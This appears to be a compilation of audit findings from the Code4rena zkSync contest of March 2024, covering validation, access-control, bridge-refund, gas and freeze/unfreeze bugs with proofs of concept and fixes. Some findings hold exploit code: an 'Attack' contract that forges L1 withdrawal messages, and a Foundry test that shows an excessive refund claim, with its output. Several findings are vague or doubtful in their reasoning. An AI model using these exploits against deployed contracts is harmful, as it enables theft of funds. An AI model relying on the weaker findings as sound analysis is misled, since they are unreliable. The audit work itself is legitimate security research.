https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/upgrades/BaseZkSyncUpgrade.sol#L147-L157

Vulnerability details

Impact

To properly upgrade VerifierParams, none of the parameters recursionNodeLevelVkHash, recursionLeafLevelVkHash, and recursionCircuitsSetVksHash may be empty (bytes32(0)).
However, the current implementation of _setVerifierParams() does not enforce this requirement: if at least one of these parameters is non-zero, _setVerifierParams() will upgrade VerifierParams.

This basically means, that it's possible to upgrade VerifierParams even when some of the parameters are bytes32(0). This should not be possible. The VerifierParams should be upgraded only when all provided parameters are non-empty.

This behavior is even confirmed in the previous version of the zkSync code:

File: previous contest

    function _setVerifierParams(VerifierParams calldata _newVerifierParams) private {
        if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

During the previous contest, function _setVerifierParams() was using || operator, while the current implementation of _setVerifierParams() is using && operator.

Proof of Concept

File: BaseZkSyncUpgrade.sol

        if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) &&
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

        VerifierParams memory oldVerifierParams = s.verifierParams;
        s.verifierParams = _newVerifierParams;
        emit NewVerifierParams(oldVerifierParams, _newVerifierParams);

As demonstrated above, the function uses the AND operator (&&) instead of OR (||). This means that if at least one parameter is not bytes32(0), the condition is not fulfilled, and the function continues execution and sets VerifierParams.

E.g., let's consider a scenario, where:

_newVerifierParams.recursionNodeLevelVkHash == bytes32(0)
_newVerifierParams.recursionLeafLevelVkHash == bytes32(0)
_newVerifierParams.recursionCircuitsSetVksHash == bytes32(11)

Even though the above params are not correct (recursionNodeLevelVkHash and recursionLeafLevelVkHash are bytes32(0)), the function won't return at lines 147-153, because recursionCircuitsSetVksHash is not bytes32(0), and it will update VerifierParams.

This leads to the conclusion that _setVerifierParams() will upgrade VerifierParams even when some of its parameters are empty.
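The effect of the two operators can be sketched in a few lines (Python used here purely as illustration; the parameter names mirror the Solidity struct fields):

```python
ZERO = b"\x00" * 32  # stands in for bytes32(0)

def should_skip_and(node, leaf, circuits):
    # current implementation: skip the upgrade only when ALL params are zero
    return node == ZERO and leaf == ZERO and circuits == ZERO

def should_skip_or(node, leaf, circuits):
    # previous implementation: skip the upgrade when ANY param is zero
    return node == ZERO or leaf == ZERO or circuits == ZERO

# two params empty, one non-empty (the scenario described above)
params = (ZERO, ZERO, (11).to_bytes(32, "big"))

print(should_skip_and(*params))  # False -> upgrade proceeds despite empty params
print(should_skip_or(*params))   # True  -> upgrade skipped, as intended
```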

Tools Used

Manual code review

Recommended Mitigation Steps

Use OR instead of AND. It should not be possible to upgrade VerifierParams when any of the parameters is bytes32(0):

The code should be changed to:

        if (
            _newVerifierParams.recursionNodeLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionLeafLevelVkHash == bytes32(0) ||
            _newVerifierParams.recursionCircuitsSetVksHash == bytes32(0)
        ) {
            return;
        }

Assessed type

Invalid Validation

An attacker can drain funds on L1 from L2

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/contracts/L1Messenger.sol#L116

Vulnerability details

Impact

An attacker can drain funds from L1 without burning tokens on L2.

Proof of Concept

The L1Messenger.sendToL1 function is always called when a user withdraws funds from L2 to L1; the resulting message is the signal the bridge acts upon on L1.

File: L2BaseToken.sol

    function withdraw(address _l1Receiver) external payable override {
        uint256 amount = _burnMsgValue();

        // Send the L2 log, a user could use it as proof of the withdrawal
        bytes memory message = _getL1WithdrawMessage(_l1Receiver, amount);
        L1_MESSENGER_CONTRACT.sendToL1(message);

        emit Withdrawal(msg.sender, _l1Receiver, amount);
    }

Unfortunately, when we look at the L1Messenger.sendToL1 function, it has no access control, so anyone can call it and send malicious messages to L1.

POC

pragma solidity 0.8.20;

import {L1Messenger} from "./L1Messenger.sol";
// IMailbox is assumed to be available locally; only its selector is needed
import {IMailbox} from "./IMailbox.sol";

contract Attack {
    L1Messenger public L1_MESSENGER_CONTRACT;

    constructor(address l1Messenger) {
        L1_MESSENGER_CONTRACT = L1Messenger(l1Messenger);
    }

    function attack(uint256 amount) public {
        bytes memory message = _getL1WithdrawMessageMalicious(msg.sender, amount);
        L1_MESSENGER_CONTRACT.sendToL1(message);
    }

    function _getL1WithdrawMessageMalicious(address _to, uint256 _amount) internal pure returns (bytes memory) {
        return abi.encodePacked(IMailbox.finalizeEthWithdrawal.selector, _to, _amount);
    }
}

Tools Used

Manual

Recommended Mitigation Steps

Add access control, e.g. restrict sendToL1 callers to the bridge or to system contracts.

Assessed type

Access Control

Wrong Code Implementation or Comment Description

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/PriorityQueue.sol#L34
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/PriorityQueue.sol#L46

Vulnerability details

Impact

The wrong total number of unprocessed priority operations is returned when the size of the priority queue is requested.

Proof of Concept

 /// @notice Returns zero if and only if no operations were processed from the queue
>>>    /// @return Index of the oldest priority operation that wasn't processed yet
    function getFirstUnprocessedPriorityTx(Queue storage _queue) internal view returns (uint256) {
        return _queue.head;
    }

The comment highlighted above states that the function returns the index of the oldest priority operation that wasn't processed yet, meaning _queue.head itself is one of the operations that hasn't been processed.
The code below shows how the size, i.e. the number of unprocessed priority operations, is computed. The problem is that _queue.head is not taken into account; only the entries after _queue.head up to _queue.tail are counted.

  /// @return The total number of unprocessed priority operations in a priority queue
    function getSize(Queue storage _queue) internal view returns (uint256) {
>>>        return uint256(_queue.tail - _queue.head);
    }

Tools Used

Manual Review

Recommended Mitigation Steps

The protocol should include _queue.head in the size count by adding 1 after the subtraction. If the current behavior is intended, the comment above the getFirstUnprocessedPriorityTx(...) function should be corrected instead:

  /// @return The total number of unprocessed priority operations in a priority queue
    function getSize(Queue storage _queue) internal view returns (uint256) {
---        return uint256(_queue.tail - _queue.head);
+++        return uint256(_queue.tail - _queue.head + 1);
    }

Assessed type

Access Control

StateTransitionManager doesn't have ability to set some settings for chain

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L45-L64

Vulnerability details

Proof of Concept

There are several settings that can be set by StateTransitionManager in the admin facet for the chain. All of those functions use the onlyStateTransitionManager modifier.

However, StateTransitionManager itself has no means to call those functions and thus change the configuration. While all settings are set during the initial proxy upgrade, StateTransitionManager can't change those values for existing chains, and the invariant is broken.

Impact

StateTransitionManager can't change some settings for the chain.

Tools Used

VsCode

Recommended Mitigation Steps

Implement functions on StateTransitionManager that call these admin-facet setters.

Assessed type

Error

Unable to Get Correct Recipient Address

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridgehub/Bridgehub.sol#L325-L335

Vulnerability details

Impact

In the Bridgehub contract, the _actualRefundRecipient function is responsible for obtaining the correct _recipient address. Specifically, if the _refundRecipient address on L1 is a contract, it needs to be converted to an L2 alias. However, the function does not consider the case where _refundRecipient is set to the calling contract (msg.sender).

If _actualRefundRecipient is reached from a contract's constructor with _refundRecipient set to the contract's own address, _refundRecipient is a contract, but _refundRecipient.code.length is 0 (code is not yet deployed during construction), so the contract address on L1 will not be converted to an L2 alias.

Proof of Concept

// SPDX-License-Identifier: GPL-3.0
pragma solidity 0.8.20;
import "forge-std/console.sol";

interface IContractB {
    function actualRefundRecipient(address _refundRecipient) external  view returns (address _recipient);
}

contract A {
    constructor(address b) {

        testActualRefundRecipient(b);
    }

    function testActualRefundRecipient(address b) public view returns (address _recipient) {
        console.log("address this: ", address(this));
        _recipient = IContractB(b).actualRefundRecipient(address(this));
        console.log("address recipient: ", _recipient);
    }
}

Tools Used

Remix

Recommended Mitigation Steps

In the _actualRefundRecipient function, we need to consider the situation where _refundRecipient is msg.sender but not equal to tx.origin.

Assessed type

Other

When a batch, initially committed with system contract upgrades, is rolled back using the revertBatches() function to stop its execution, any subsequent batches that were meant to be committed without system contract upgrades will instead be committed as if they had system contract upgrades

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Executor.sol#L481-L493

Vulnerability details

Impact

See the impact described in report code-423n4/2023-10-zksync-findings#527.

Proof of Concept

See the proof in report code-423n4/2023-10-zksync-findings#527.

Tools Used

Manual Review

Recommended Mitigation Steps

The protocol should consider deleting s.l2SystemContractsUpgradeTxHash alongside the batch number under every circumstance in which s.l2SystemContractsUpgradeBatchNumber is deleted.

Assessed type

Context

Denial of Service when PathLength of Merkle Root is Within a Valid Value

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/libraries/Merkle.sol#L25

Vulnerability details

Impact

Denial of service when the path length of a Merkle proof is exactly 256, which should be a valid length but reverts due to a wrong bound in the Merkle root calculation.

Proof of Concept

 function calculateRoot(
        bytes32[] calldata _path,
        uint256 _index,
        bytes32 _itemHash
    ) internal pure returns (bytes32) {
        uint256 pathLength = _path.length;
        require(pathLength > 0, "xc");
>>>        require(pathLength < 256, "bt");
        require(_index < (1 << pathLength), "px");

        bytes32 currentHash = _itemHash;
        for (uint256 i; i < pathLength; i = i.uncheckedInc()) {
            currentHash = (_index % 2 == 0)
                ? _efficientHash(currentHash, _path[i])
                : _efficientHash(_path[i], currentHash);
            _index /= 2;
        }

        return currentHash;
    }

The code above shows how the Merkle root is calculated in the Merkle contract. However, the code reverts when the path length is 256; since 256 is still within the allowed size, reverting causes a denial of service in the Merkle contract.
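The loop above can be sketched as follows (Python purely for illustration; sha256 stands in for the contract's keccak256-based _efficientHash so the sketch stays self-contained):

```python
import hashlib

def _hash_pair(a: bytes, b: bytes) -> bytes:
    # stand-in for _efficientHash; the contract hashes the concatenated pair
    return hashlib.sha256(a + b).digest()

def calculate_root(path: list, index: int, item_hash: bytes) -> bytes:
    assert 0 < len(path) < 256  # same bounds as the require statements
    assert index < (1 << len(path))
    current = item_hash
    for sibling in path:
        # even index: the current node is a left child; odd: a right child
        current = _hash_pair(current, sibling) if index % 2 == 0 else _hash_pair(sibling, current)
        index //= 2
    return current

# two-leaf tree: proving leaf0 (index 0) with sibling leaf1 yields the root
leaf0 = hashlib.sha256(b"a").digest()
leaf1 = hashlib.sha256(b"b").digest()
root = _hash_pair(leaf0, leaf1)
print(calculate_root([leaf1], 0, leaf0) == root)  # True
```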

Tools Used

Manual Review

Recommended Mitigation Steps

As corrected below, a path length of 256 should also be allowed without reverting:

 function calculateRoot(
        bytes32[] calldata _path,
        uint256 _index,
        bytes32 _itemHash
    ) internal pure returns (bytes32) {
        uint256 pathLength = _path.length;
        require(pathLength > 0, "xc");
---        require(pathLength < 256, "bt");
+++        require(pathLength <= 256, "bt");
        require(_index < (1 << pathLength), "px");

        bytes32 currentHash = _itemHash;
        for (uint256 i; i < pathLength; i = i.uncheckedInc()) {
            currentHash = (_index % 2 == 0)
                ? _efficientHash(currentHash, _path[i])
                : _efficientHash(_path[i], currentHash);
            _index /= 2;
        }

        return currentHash;
    }

Assessed type

DoS

Security Vulnerabilities and Access Control Issues in L1ERC20Bridge Smart Contract

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/bridge/L1ERC20Bridge.sol/README.md?plain=1#L63

Vulnerability details

Impact


Access Control and Permissions:

Error: The tranferTokenToSharedBridge function lacks proper access control, allowing any caller to transfer tokens to the shared bridge.

Solution: Implement access control checks to restrict the tranferTokenToSharedBridge function to specific roles or contracts. You can use access control modifiers or require statements to ensure that only authorized users can call this function. For example:

function tranferTokenToSharedBridge(address _token, uint256 _amount) external {
    require(msg.sender == address(sharedBridge), "Not authorized");
    // Transfer tokens to the shared bridge
}

Data Availability Issues:

Error: The mappings depositAmount and isWithdrawalFinalized are used to store data related to deposits and withdrawals, but there's no access control or validation mechanism to ensure data integrity or restrict access.

Solution: Implement access control checks and validation mechanisms to ensure that only authorized users can access or modify the data stored in these mappings. You can use modifiers or require statements to enforce access control and validate inputs before updating the mappings.

EVM Compatibility Attacks:

Error: The contract lacks protection against reentrancy attacks, especially in functions like deposit and claimFailedDeposit where external calls are made and state is modified.

Solution: Use the nonReentrant modifier to prevent reentrancy attacks in functions that involve external calls or state modifications. You can apply this modifier to relevant functions to ensure that reentrant calls cannot occur. Here's an example of how to implement the nonReentrant modifier:

modifier nonReentrant() {
    require(!_locked, "Reentrant call detected");
    _locked = true;
    _;
    _locked = false;
}

Ensure that the _locked variable is properly initialized and reset within the modifier. Apply this modifier to relevant functions to protect against reentrancy attacks.

Gas-related Vulnerabilities:

Error: Gas limits for external calls are passed as parameters to functions like deposit, which may lead to potential gas-related vulnerabilities if not set appropriately.

Solution: Review the gas limits passed to external calls in functions like deposit and ensure that they are set appropriately based on the expected gas consumption. Consider using safe gas limits and performing gas estimation to prevent potential gas-related exploits. Additionally, consider optimizing gas usage in critical functions to minimize the risk of gas-related vulnerabilities.

Proof of Concept


Tool Used

Remix

Recommended Mitigation Steps

Assessed type

Error

state-transition#unfreezeChain is freezeChain in fact

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L159-L167

Vulnerability details

Impact

StateTransitionManager.unfreezeChain is in fact freezeChain: when the owner tries to unfreeze a chain, it is frozen again, which means the chain can never be unfrozen.

Proof of Concept

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L159-L167

/// @dev freezes the specified chain
function freezeChain(uint256 _chainId) external onlyOwner {
    IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
}

/// @dev freezes the specified chain
function unfreezeChain(uint256 _chainId) external onlyOwner {
    IZkSyncStateTransition(stateTransition[_chainId]).freezeDiamond();
}

In the function unfreezeChain(), the call should be:
IZkSyncStateTransition(stateTransition[_chainId]).unfreezeDiamond();

Tools Used

Manual review

Recommended Mitigation Steps

change function unfreezeChain() to the following:

function unfreezeChain(uint256 _chainId) external onlyOwner {
    IZkSyncStateTransition(stateTransition[_chainId]).unfreezeDiamond();
}

Assessed type

Other

Mathematical inaccuracy can lead to wrong prices

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L167
https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L171

Vulnerability details

Impact

The mathematical inaccuracy in the calculation involving uint256 fullPubdataPriceBaseToken and l2GasPrice can result in precision loss

Proof of Concept

By the principle of PEMDAS/BODMAS, division comes before addition, but evaluating the expression for uint256 fullPubdataPriceBaseToken in the opposite order would return a wrong result. For instance, let pubdataPriceBaseToken be 10 wei, batchOverheadBaseToken be 20 wei, and uint256(feeParams.maxPubdataPerBatch) be 5.

Without PEMDAS (addition first), fullPubdataPriceBaseToken gives (10 + 20) / 5 = 6 wei, but with PEMDAS applied (division first) it gives 10 + 20 / 5 = 14 wei.
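The two groupings from the example above can be checked with plain integer arithmetic (the values are the hypothetical ones from this report):

```python
pubdata_price_base_token = 10   # wei, hypothetical
batch_overhead_base_token = 20  # wei, hypothetical
max_pubdata_per_batch = 5

# division first (standard operator precedence)
division_first = pubdata_price_base_token + batch_overhead_base_token // max_pubdata_per_batch
# addition first (the alternative grouping)
addition_first = (pubdata_price_base_token + batch_overhead_base_token) // max_pubdata_per_batch

print(division_first)  # 14
print(addition_first)  # 6
```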

Tools Used

Manual Review

Recommended Mitigation Steps

Division should come before addition in these calculations, or the parameters involved in the division should be parenthesized explicitly:

uint256 fullPubdataPriceBaseToken = pubdataPriceBaseToken +
    (batchOverheadBaseToken / uint256(feeParams.maxPubdataPerBatch));

Or:

uint256 fullPubdataPriceBaseToken = (pubdataPriceBaseToken +
    batchOverheadBaseToken) / uint256(feeParams.maxPubdataPerBatch);

whichever calculation is intended. The same should also apply to the l2GasPrice calculation.

Assessed type

Error

Loss of Fund During Execution of Call Data

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/governance/Governance.sol#L226

Vulnerability details

Impact

Loss of funds when msg.value is greater than the cumulative sum of _calls[i].value in the execution function call.

Proof of Concept

 function _execute(Call[] calldata _calls) internal {
        for (uint256 i = 0; i < _calls.length; ++i) {
>>>            (bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value}(_calls[i].data);
            if (!success) {
                // Propagate an error if the call fails.
                assembly {
                    revert(add(returnData, 0x20), mload(returnData))
                }
            }
        }
    }

The code above shows how the _execute(...) function is implemented in the Governance contract. It loops through the calls array, spending _calls[i].value on each iteration, but there is no validation that the sum of _calls[i].value equals msg.value, so any excess funds sent are lost to the contract.
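A minimal sketch of the missing check (Python purely for illustration; the call targets are elided and the values are hypothetical):

```python
def execute(calls, msg_value):
    # the sum of per-call values must exactly consume msg.value,
    # otherwise the surplus is stranded in the contract
    call_value_sum = sum(c["value"] for c in calls)
    if call_value_sum != msg_value:
        raise ValueError("TransactionError: msg.value != sum of call values")
    for c in calls:
        pass  # perform target.call{value: c["value"]}(data) here

calls = [{"value": 3}, {"value": 2}]
execute(calls, 5)      # ok: 3 + 2 == 5
try:
    execute(calls, 7)  # 2 wei would be stranded -> rejected
except ValueError as e:
    print(e)
```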

Tools Used

Manual Review

Recommended Mitigation Steps

The _execute(...) function should be adjusted to validate the total value and prevent loss of funds to the contract, as provided below:

 function _execute(Call[] calldata _calls) internal {
+++ uint callValueSum;
        for (uint256 i = 0; i < _calls.length; ++i) {
            (bool success, bytes memory returnData) = _calls[i].target.call{value: _calls[i].value}(_calls[i].data);
+++        callValueSum += _calls[i].value;
            if (!success) {
                // Propagate an error if the call fails.
                assembly {
                    revert(add(returnData, 0x20), mload(returnData))
                }
            }
        }
+++ require(msg.value == callValueSum, "TransactionError");
    }

Assessed type

ETH-Transfer

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

Users might be charged unfair amount of baseToken for L2Gas due to vulnerable baseToken price conversion implementation

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L159-L160
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L79

Vulnerability details

Impact

Users might be charged unfair amount of baseToken for L2Gas due to vulnerable baseToken price conversion implementation.

Proof of Concept

Hyperchains allow non-ETH baseToken chains. When users request L1->L2 transactions on a non-ETH chain, they pay L2 gas in the baseToken instead of ETH.

The problem is that the baseToken L2 gas conversion might use an outdated baseToken/ETH ratio due to a vulnerable price update mechanism, setTokenMultiplier.

When a user requests an L1->L2 transaction, Mailbox checks in _requestL2Transaction() whether the user sent enough baseToken (mintValue) to cover gas (baseCost): uint256 baseCost = _params.l2GasPrice * _params.l2GasLimit. l2GasPrice is calculated in _deriveL2GasPrice() based on the baseToken multipliers.

//code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol
    function _deriveL2GasPrice(
        uint256 _l1GasPrice,
        uint256 _gasPerPubdata
    ) internal view returns (uint256) {
...
 |>       uint256 l1GasPriceConverted = (_l1GasPrice *
            s.baseTokenGasPriceMultiplierNominator) /
            s.baseTokenGasPriceMultiplierDenominator;
        uint256 pubdataPriceBaseToken;
...

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Mailbox.sol#L159-L160)

However, s.baseTokenGasPriceMultiplierNominator and s.baseTokenGasPriceMultiplierDenominator can only be updated in setTokenMultiplier() by the chain admin, which is most likely a multi-sig contract. Since the multiplier is not updated dynamically, an old or assumed baseToken/ETH ratio is used for the baseCost check, and the user is charged a baseCost based on an outdated ratio. The user can be overcharged.

//code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol
//@audit setTokenMultiplier can only called by chain Admin after chain genesis, the chain Admin is most likely a multi-sig contract, which will not update baseToken/ETH ratio in time, resulting in stale price.
    function setTokenMultiplier(
        uint128 _nominator,
        uint128 _denominator
|>    ) external onlyAdminOrStateTransitionManager {
...
        s.baseTokenGasPriceMultiplierNominator = _nominator;
        s.baseTokenGasPriceMultiplierDenominator = _denominator;
...

(https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/state-transition/chain-deps/facets/Admin.sol#L79)
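A small numeric sketch of the conversion above (all figures hypothetical) shows how a stale nominator/denominator misprices gas:

```python
l1_gas_price = 30  # in gwei, hypothetical

# old ratio, still stored on-chain because the multi-sig has not updated it
stale_nominator, stale_denominator = 2000, 1
# fair ratio after the baseToken doubles in value against ETH
fresh_nominator, fresh_denominator = 1000, 1

stale_price = l1_gas_price * stale_nominator // stale_denominator
fresh_price = l1_gas_price * fresh_nominator // fresh_denominator

print(stale_price)  # 60000 -> user is charged twice the fair baseToken amount
print(fresh_price)  # 30000
```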

Tools Used

Manual

Recommended Mitigation Steps

Consider allowing baseToken multipliers to be updated dynamically, not just by admin multi-sig.

Assessed type

Other

QA Report

See the markdown file with the details of this report here.

QA Report

See the markdown file with the details of this report here.

StateTransitionManager.unfreezeChain calls wrong function

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/main/code/contracts/ethereum/contracts/state-transition/StateTransitionManager.sol#L166

Vulnerability details

Proof of Concept

Using the StateTransitionManager.freezeChain function, the admin can freeze a specific chain. This means that all freezable facets will no longer be callable.

The StateTransitionManager.unfreezeChain function should do the opposite; however, it mistakenly calls freeze as well, which means it will not be possible to unfreeze the proxy.

Impact

It is not possible to unfreeze the proxy; an upgrade would be needed.

Tools Used

VsCode

Recommended Mitigation Steps

Use correct function to unfreeze.

Assessed type

Error

User will pay more gas than defined in Ethereum Yellow Paper

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/system-contracts/bootloader/bootloader.yul#L101-L107

Vulnerability details

Impact

The Ethereum Yellow Paper defines two types of G_txdata:

G_txdatazero - 4 Paid for every zero byte of data or code for a transaction.
G_txdatanonzero - 16 Paid for every non-zero byte of data or code for a transaction.

As we see, non-zero byte of data costs more (16) than a zero byte (4).

However, L1_GAS_PER_PUBDATA_BYTE() implemented in bootloader.yul does not distinguish between zero and non-zero bytes of transaction data or code; every byte costs 17. This behavior implies a user loss, because the user always pays the same constant amount of gas, even for a zero byte of data or code (which should cost less than a non-zero byte).

Proof of Concept

File: bootloader.yul

/// @dev The number of L1 gas needed to be spent for
/// L1 byte. While a single pubdata byte costs `16` gas,
/// we demand at least 17 to cover up for the costs of additional
/// hashing of it, etc.
function L1_GAS_PER_PUBDATA_BYTE() -> ret {
    ret := 17
}

As demonstrated above, the number of L1 gas to be spent per L1 byte is constant, hardcoded to 17.
The user pays 17 gas regardless of whether the byte of transaction data or code is zero or non-zero.

According to the Ethereum Yellow Paper, zero bytes cost less (4) than non-zero ones (16). This requirement is not fulfilled in bootloader.yul, because both zero and non-zero L1 bytes cost 17.
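The gap can be illustrated by pricing the same payload both ways, with the Yellow Paper's 4/16 split versus the flat 17 (payload contents are hypothetical):

```python
G_TXDATAZERO, G_TXDATANONZERO = 4, 16  # Yellow Paper calldata costs
FLAT_PUBDATA_COST = 17                 # constant from bootloader.yul

payload = bytes([0x00] * 60 + [0xFF] * 40)  # 60 zero bytes, 40 non-zero bytes

yellow_paper_cost = sum(G_TXDATAZERO if b == 0 else G_TXDATANONZERO for b in payload)
flat_cost = FLAT_PUBDATA_COST * len(payload)

print(yellow_paper_cost)  # 60*4 + 40*16 = 880
print(flat_cost)          # 100*17 = 1700
```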

Tools Used

Manual code review

Recommended Mitigation Steps

Separate costs for zero and non-zero byte of data or code for a transaction. The zero byte of data or code for a transaction should cost less.

Assessed type

Other

An attacker could potentially claim another person's refund or apply for an excessive refund through the `claimFailedDepositLegacyErc20Bridge`.

Lines of code

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L329-L345
https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L644-L666

Vulnerability details

A refund request can be initiated from the Legacy Bridge contract using claimFailedDepositLegacyErc20Bridge.

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L644-L666

    function claimFailedDepositLegacyErc20Bridge(
        address _depositSender,
        address _l1Token,
        uint256 _amount,
        bytes32 _l2TxHash,
        uint256 _l2BatchNumber,
        uint256 _l2MessageIndex,
        uint16 _l2TxNumberInBatch,
        bytes32[] calldata _merkleProof
    ) external override onlyLegacyBridge {
        _claimFailedDeposit(
            true,
            ERA_CHAIN_ID,
            _depositSender,
            _l1Token,
            _amount,
            _l2TxHash,
            _l2BatchNumber,
            _l2MessageIndex,
            _l2TxNumberInBatch,
            _merkleProof
        );
    }

It calls the internal function _claimFailedDeposit, where:

  • _isEraLegacyWithdrawal is true,
  • weCanCheckDepositHere is false,
  • notCheckedInLegacyBridgeOrWeCanCheckDeposit is false.

According to this logic, the pathway does not verify the deposit details (who initiated the deposit, which token was deposited, and the deposit amount).

https://github.com/code-423n4/2024-03-zksync/blob/4f0ba34f34a864c354c7e8c47643ed8f4a250e13/code/contracts/ethereum/contracts/bridge/L1SharedBridge.sol#L329-L345

        {
            bool notCheckedInLegacyBridgeOrWeCanCheckDeposit;
            {
                // Deposits that happened before the upgrade cannot be checked here, they have to be claimed and checked in the legacyBridge
                bool weCanCheckDepositHere = !_isEraLegacyWithdrawal(_chainId, _l2BatchNumber);
                // Double claims are not possible, as we this check except for legacy bridge withdrawals
                // Funds claimed before the update will still be recorded in the legacy bridge
                // Note we double check NEW deposits if they are called from the legacy bridge 
                notCheckedInLegacyBridgeOrWeCanCheckDeposit = (!_checkedInLegacyBridge) || weCanCheckDepositHere; 
            }
            if (notCheckedInLegacyBridgeOrWeCanCheckDeposit) {
                bytes32 dataHash = depositHappened[_chainId][_l2TxHash];
                bytes32 txDataHash = keccak256(abi.encode(_depositSender, _l1Token, _amount));
                require(dataHash == txDataHash, "ShB: d.it not hap");
                delete depositHappened[_chainId][_l2TxHash];
            }
        }

Impact

  • Impersonation: Attackers could claim refunds for deposits they did not initiate, effectively impersonating legitimate users.
  • Excessive Refunds: Attackers might claim more than the actual failed deposit amount, leading to excessive refunds.

Proof of Concept

Attack scenario:

  1. Alice deposits 50 tokens on L1 before the Legacy Bridge update to the Shared Bridge.
  2. The deposit fails to roll up to L2 for some reason.
  3. Alice does not immediately request a refund from L1.
  4. The system is updated to the Shared Bridge.
  5. Alice requests a refund of 55 tokens from Legacy Bridge calling claimFailedDepositLegacyErc20Bridge.
  6. Since the deposit details (who initiated the deposit, what token was deposited, and the amount of the deposit) are not verified, Alice gets an excessive refund.

Test code

Added the test_excessiveRefundAttack function in L1SharedBridgeLegacy.t.sol:

    function test_excessiveRefundAttack() public {
        // mint 100 for shareBridge,50 from alice, 50 from others
        token.mint(address(sharedBridge), amount);

        // storing depoistHappend[chainId][l2TxHash] = txDataHash. DepositHappened is 3rd so 3 -1 + dependency storage slots
        uint256 depositLocationInStorage = uint256(3 - 1 + 1 + 1);
        uint256 amountAlice = 50;
        uint256 amountAliceExcessive = 55;
        bytes32 txDataHash = keccak256(abi.encode(alice, address(token), amountAlice));
        vm.store(
            address(sharedBridge),
            keccak256(abi.encode(txHash, keccak256(abi.encode(ERA_CHAIN_ID, depositLocationInStorage)))),
            txDataHash
        );
        require(sharedBridge.depositHappened(ERA_CHAIN_ID, txHash) == txDataHash, "Deposit not set");
        
        uint256 chainBalanceLocationInStorage = uint256(6 - 1 + 1 + 1);
        vm.store(
            address(sharedBridge),
            keccak256(
                abi.encode(
                    uint256(uint160(address(token))),
                    keccak256(abi.encode(ERA_CHAIN_ID, chainBalanceLocationInStorage))
                )
            ),
            bytes32(amount)
        );

        // Bridgehub bridgehub = new Bridgehub();
        // vm.store(address(bridgehub),  bytes32(uint256(5 +2)), bytes32(uint256(31337)));
        // require(address(bridgehub.deployer()) == address(31337), "Bridgehub: deployer wrong");
        
        vm.mockCall(
            bridgehubAddress,
            abi.encodeWithSelector(
                IBridgehub.proveL1ToL2TransactionStatus.selector,
                ERA_CHAIN_ID,
                txHash,
                l2BatchNumber,
                l2MessageIndex,
                l2TxNumberInBatch,
                merkleProof,
                TxStatus.Failure
            ),
            abi.encode(true)
        );
        console2.log("Alice Before Refound: ", token.balanceOf(alice));

        vm.prank(l1ERC20BridgeAddress);
        sharedBridge.claimFailedDepositLegacyErc20Bridge(
            alice,
            address(token),
            amountAliceExcessive,
            txHash,
            l2BatchNumber,
            l2MessageIndex,
            l2TxNumberInBatch,
            merkleProof
        );
        console2.log("Alice Excessive Refound: ", token.balanceOf(alice));
    }

You should get the following output:

[PASS] test_excessiveRefundAttack() (gas: 138031)
Logs:
  Alice Before Refound:  0
  Alice Excessive Refound:  55

